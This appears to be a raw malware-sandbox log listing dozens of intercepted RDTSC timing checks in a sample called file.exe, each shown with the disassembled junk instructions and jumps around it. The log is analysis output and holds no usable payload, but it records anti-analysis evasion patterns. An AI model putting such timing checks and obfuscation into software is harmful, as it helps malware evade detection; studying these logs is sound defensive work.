Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B3984 second address: 10B398A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B398A second address: 10B3994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B3994 second address: 10B399A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B34FB second address: 10B350C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDD5537C43Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAC64 second address: 10BAC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAC70 second address: 10BAC76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BC2B6 second address: 10BC2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BC2BA second address: 10BC2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDD5537C445h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDD5537C43Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BC2E5 second address: 10BC2E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C16E7 second address: 10C16EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6052 second address: 10C605A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C605A second address: 10C6084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FDD5537C43Fh 0x0000000b jmp 00007FDD5537C444h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6084 second address: 10C608A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C608A second address: 10C608E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C608E second address: 10C6094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6094 second address: 10C60A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C60A2 second address: 10C60A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C60A6 second address: 10C60AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C60AC second address: 10C60D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDD5513FC27h 0x00000008 jns 00007FDD5513FC16h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5EAE second address: 10C5EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CEDEC second address: 10CEDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CEF32 second address: 10CEF5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDD5537C43Ah 0x00000008 jmp 00007FDD5537C447h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CEF5E second address: 10CEF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CF35E second address: 10CF364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CF4A8 second address: 10CF4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FDD5513FC1Ah 0x0000000b jmp 00007FDD5513FC28h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CF4D2 second address: 10CF51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FDD5537C43Ch 0x0000000c push edx 0x0000000d jmp 00007FDD5537C43Fh 0x00000012 pop edx 0x00000013 je 00007FDD5537C442h 0x00000019 jne 00007FDD5537C436h 0x0000001f jnc 00007FDD5537C436h 0x00000025 pushad 0x00000026 jmp 00007FDD5537C441h 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CFECC second address: 10CFEF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007FDD5513FC22h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D3C66 second address: 10D3C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D3C6C second address: 10D3C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E609D second address: 10E60A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E60A1 second address: 10E60B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FDD5513FC16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E60B1 second address: 10E60B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E60B7 second address: 10E60BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD999C second address: FD99B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C442h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD99B2 second address: FD99B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD99B8 second address: FD99F0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDD5537C447h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FDD5537C448h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD99F0 second address: FD99FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD99FD second address: FD9A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9A01 second address: FD9A19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9A19 second address: FD9A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9A1D second address: FD9A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9A23 second address: FD9A42 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDD5537C445h 0x00000008 jmp 00007FDD5537C43Fh 0x0000000d jp 00007FDD5537C43Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F62B2 second address: 10F62E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FDD5513FC21h 0x0000000a jmp 00007FDD5513FC1Bh 0x0000000f jmp 00007FDD5513FC1Ch 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111103B second address: 1111067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FDD5537C447h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDD5537C43Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11111F1 second address: 11111F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11111F7 second address: 11111FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11111FE second address: 1111238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FDD5513FC29h 0x0000000f push eax 0x00000010 pop eax 0x00000011 jl 00007FDD5513FC16h 0x00000017 popad 0x00000018 js 00007FDD5513FC22h 0x0000001e je 00007FDD5513FC16h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11113A1 second address: 11113A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11118AE second address: 11118B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11118B2 second address: 11118B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11118B8 second address: 11118C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11118C1 second address: 11118F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDD5537C436h 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007FDD5537C43Bh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jmp 00007FDD5537C43Ah 0x0000001d popad 0x0000001e jmp 00007FDD5537C43Fh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111A66 second address: 1111A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FDD5513FC16h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111A73 second address: 1111A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD5537C43Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111D8E second address: 1111D97 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111D97 second address: 1111DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDD5537C436h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDD5537C440h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111DB6 second address: 1111DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111494A second address: 111496F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C445h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b js 00007FDD5537C440h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114BB9 second address: 1114BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114BBD second address: 1114BC3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114BC3 second address: 1114BC8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114C1F second address: 1114C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114C24 second address: 1114C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114E9E second address: 1114EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114EA3 second address: 1114F0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx edx, dx 0x0000000f push dword ptr [ebp+122D1C7Ah] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FDD5513FC18h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1E1Fh], ecx 0x00000035 call 00007FDD5513FC1Dh 0x0000003a mov dh, bl 0x0000003c pop edx 0x0000003d call 00007FDD5513FC19h 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 push edx 0x00000046 pop edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114F0A second address: 1114F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114F0E second address: 1114F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FDD5513FC18h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007FDD5513FC16h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114F28 second address: 1114F3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116155 second address: 111615F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDD5513FC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111615F second address: 1116171 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDD5537C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FDD5537C43Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1117DCB second address: 1117DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC0132 second address: 4FC0178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FDD5537C43Dh 0x00000013 or si, 12D6h 0x00000018 jmp 00007FDD5537C441h 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC0178 second address: 4FC01BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDD5513FC1Eh 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FDD5513FC20h 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ecx, edx 0x00000019 jmp 00007FDD5513FC29h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB002C second address: 4FB0070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4158D16Ah 0x00000008 pushfd 0x00000009 jmp 00007FDD5537C43Bh 0x0000000e adc al, 0000000Eh 0x00000011 jmp 00007FDD5537C449h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FDD5537C43Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0070 second address: 4FB0080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD5513FC1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0080 second address: 4FB00A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDD5537C444h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB00A8 second address: 4FB00C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDD5513FC24h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB00C9 second address: 4FB00FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FDD5537C446h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 mov di, ACEEh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB00FB second address: 4FB010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD5513FC1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF04DA second address: 4FF04DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF04DE second address: 4FF04E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF04E4 second address: 4FF04FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, cl 0x00000005 mov edx, 55F3D97Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ebx, 49D4A580h 0x00000016 push edx 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF04FD second address: 4FF0503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF0503 second address: 4FF0507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF0507 second address: 4FF0531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FDD5513FC28h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov cl, 55h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF0531 second address: 4FF0545 instructions: 0x00000000 rdtsc 0x00000002 mov bh, 62h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDD5537C43Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F800E6 second address: 4F80133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDD5513FC21h 0x00000009 or ax, B926h 0x0000000e jmp 00007FDD5513FC21h 0x00000013 popfd 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDD5513FC29h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80133 second address: 4F80139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80139 second address: 4F8013D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F8013D second address: 4F8019B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDD5537C446h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FDD5537C440h 0x00000014 mov ebp, esp 0x00000016 jmp 00007FDD5537C440h 0x0000001b push dword ptr [ebp+04h] 0x0000001e jmp 00007FDD5537C440h 0x00000023 push dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F8019B second address: 4F8019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
